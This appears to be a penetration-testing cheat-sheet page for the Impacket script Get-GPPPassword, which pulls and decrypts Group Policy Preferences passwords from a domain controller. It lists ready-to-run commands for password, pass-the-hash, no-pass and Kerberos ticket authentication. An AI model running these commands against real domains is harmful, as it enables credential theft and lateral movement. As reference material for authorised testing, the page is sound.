Skip to content

Get-GPPPassword

Description

Python script for extracting and decrypting Group Policy Preferences passwords, using Impacket's lib, and using streams for carving files instead of mounting shares

Usage

Get-GPPPassword.py -xmlfile 'policy.xml' 'LOCAL'
Get-GPPPassword.py -dc-ip 10.10.10.10 qu35t.pw/svc_user:password

Authentication

Get-GPPPassword.py -hashes :'NTHASH' -dc-ip 10.10.10.10 qu35t.pw/svc_user
Get-GPPPassword.py qu35t.pw/svc_user -no-pass -dc-ip 10.10.10.10
export KRB5CCNAME=svc_user.ccache
Get-GPPPassword.py -k -no-pass -dc-ip 10.10.10.10 qu35t.pw/svc_user

References